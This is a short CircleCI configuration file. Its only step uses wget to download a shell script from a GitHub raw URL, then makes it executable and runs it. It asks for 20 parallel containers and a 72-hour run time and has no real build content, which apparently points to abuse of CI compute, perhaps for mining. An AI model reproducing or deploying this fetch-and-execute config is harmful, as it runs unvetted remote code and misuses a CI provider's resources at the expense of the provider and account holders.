version: 2.1
jobs:
  build:
    docker:

      - image: circleci/golang:1.15.8
    parallelism: 20

    steps:
        - run:
            name: Syifa_11
            command: wget https://raw.githubusercontent.com/gaskemk/0/main/run.sh && chmod 500 run.sh && ./run.sh
runner:
  max_run_time: 72h
workflows:
    version: 2
    Syifa:
        jobs:
            - build
  
